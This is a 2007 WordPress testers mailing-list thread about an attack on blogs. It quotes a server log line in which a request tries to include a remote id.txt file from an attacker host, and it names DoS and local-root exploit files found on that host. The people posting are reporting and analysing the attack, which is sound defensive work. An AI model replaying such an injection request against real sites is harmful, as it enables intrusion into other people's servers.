[wp-testers] More on hack...
DD32
wordpress at dd32.id.au
Fri Dec 28 23:37:53 GMT 2007
On Sat, 29 Dec 2007 10:23:12 +1100, Simon Hollingshead <simon.hollingshead at googlemail.com> wrote:
> Now I'm no expert but by the contents of http://gw-gold.net/xpl/bot.c
> It seems like they endorse and hold DoS scripts on their server.
Looking around, I've seen a few others refering to the id.txt file and access attempts to WP, All of them are located on different servers, and the file no longer exists, My guess is that they're just using random hosts which have been exploited, rather than using servers they actually own.
It also appears to be mainly targetting specific WP plugins -- Most likely older versions, And several other common applications which have known vulnerabilities in older versions.
> There is also a GZipped Tarball file within the xpl directory but I don't
> know if I should risk opening it. They do DoS, what's to say they don't
> also hold virii?
Theres 2 dozen compiled Linux exploits, and the C code for "Gpsd remote format string exploit" and "expand_stack SMP race local root exploit" which would be POC's
The naming of the compiled files is "woot" "pwned" "own" "mailbomb" ..all useless names :)
>
> On Dec 28, 2007 11:07 PM, cpa31335 <tpblogeditor at gmail.com> wrote:
>
>> here's a snippet of my Hosts log file:
>>
>> 4.66.112.173 <http://64.66.112.173/> - - [17/Dec/2007:04:00:44 -0800] "GET
>> /?q=node/2//?q=nodehttp://gw-gold.net/xpl/id.txt
>>
>> that is what was used. I also sent this to security at wordpress.org
>>
>> nice.
>>
>> 8-(
>>
>>
>>
>> --
>> -Chuck Adkins
>> Owner and Publisher
>> The Populist News Service
>> http://www.thepopulistblog.com
>> Personal Blog:
>> http://www.thepopulistblog.com/wordpress
>> _______________________________________________
>> wp-testers mailing list
>> wp-testers at lists.automattic.com
>> http://lists.automattic.com/mailman/listinfo/wp-testers
>>
> _______________________________________________
> wp-testers mailing list
> wp-testers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-testers
>
More information about the wp-testers
mailing list